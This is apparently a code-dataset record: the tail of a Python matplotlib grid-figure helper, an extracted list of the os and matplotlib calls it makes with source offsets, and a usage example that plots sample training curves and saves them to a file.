ax = self[rw, cl]
if self.cnt[rw][cl] > 1: ax.legend()
| [
"os.makedirs",
"os.path.isdir",
"matplotlib.pyplot.close",
"os.path.dirname",
"matplotlib.rcParams.update",
"matplotlib.use",
"os.path.splitext"
] | [((749, 763), 'matplotlib.use', 'mpl.use', (['"""Agg"""'], {}), "('Agg')\n", (756, 763), True, 'import matplotlib as mpl\n'), ((2348, 2367), 'matplotlib.pyplot.close', 'plt.close', (['self.fig'], {}), '(self.fig)\n', (2357, 2367), True, 'import matplotlib.pyplot as plt\n'), ((3223, 3244), 'os.path.dirname', 'os.path.dirname', (['path'], {}), '(path)\n', (3238, 3244), False, 'import os\n'), ((3267, 3289), 'os.path.splitext', 'os.path.splitext', (['path'], {}), '(path)\n', (3283, 3289), False, 'import os\n'), ((1345, 1390), 'matplotlib.rcParams.update', 'mpl.rcParams.update', (["{'font.size': font_size}"], {}), "({'font.size': font_size})\n", (1364, 1390), True, 'import matplotlib as mpl\n'), ((3339, 3361), 'os.path.isdir', 'os.path.isdir', (['dirname'], {}), '(dirname)\n', (3352, 3361), False, 'import os\n'), ((3363, 3383), 'os.makedirs', 'os.makedirs', (['dirname'], {}), '(dirname)\n', (3374, 3383), False, 'import os\n')] |
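A usage sketch for the container above with made-up curves; the labels and output path are illustrative.

if __name__ == '__main__':
    fig = EqualGridFigure(num_rows=1, num_cols=2, ax_height=10, ax_width=8,
                          title='Training Curves', font_size=20)
    epochs = list(range(1, 11))
    fig.subtitle(0, 0, 'Loss', x_label='epoch', y_label='loss')
    fig.lineplot(0, 0, epochs, [1.0 / e for e in epochs], label='train')
    fig.lineplot(0, 0, epochs, [1.3 / e for e in epochs], label='valid')
    fig.subtitle(0, 1, 'Accuracy', x_label='epoch', y_label='accuracy')
    fig.lineplot(0, 1, epochs, [1.0 - 1.0 / (e + 1) for e in epochs])
    fig.legend()
    fig.save_fig('figures/curves.png')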